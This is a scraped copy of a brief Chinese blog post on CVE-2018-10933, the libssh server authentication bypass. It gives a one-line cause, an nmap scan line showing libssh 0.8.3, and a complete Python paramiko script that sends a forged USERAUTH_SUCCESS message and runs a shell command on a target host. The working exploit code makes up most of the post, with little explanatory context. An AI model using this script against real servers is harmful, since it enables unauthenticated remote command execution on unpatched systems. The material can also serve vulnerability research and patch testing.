zoukankan      html  css  js  c++  java
  • CVE-2018-10933 LibSSH auth bypass

    漏洞原理
    认证实现错误,
    认证分为多个步骤,可以直接跳到成功的步骤
     
     
     
    A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
     
     
    22/tcp open  ssh     libssh 0.8.3 (protocol 2.0)
    | ssh-hostkey:
    |_  2048 fe:d7:54:08:9d:1c:ba:18:4c:ba:22:3c:75:c9:39:5e (RSA)
     
     
    import paramiko
    import socket
    sock = socket.socket()
    try:
       sock.connect((str('192.168.232.198'), int(22)))
     
     
       message = paramiko.message.Message()
       transport = paramiko.transport.Transport(sock)
       transport.start_client()
     
     
       message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
       transport._send_message(message)
     
     
       cmd = transport.open_session()
     
     
       stdin, stdout, stderr = cmd.exec_command("touch /tmp/3")
       res,err = stdout.read(),stderr.read()
       result = res if res else err
     
     
       print(result)
    except:
        pass
  • 相关阅读:
    js中有关类、对象的增强函数
    ES6学习准备
    JavaScript中类型检测
    网页性能优化
    前端工程化
    2014年度总结和计划
    vim命令汇总
    互联网思维
    传统企业信息化
    创业这三年¥.NET之尴尬处境
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/11965788.html
Copyright © 2011-2022 走看看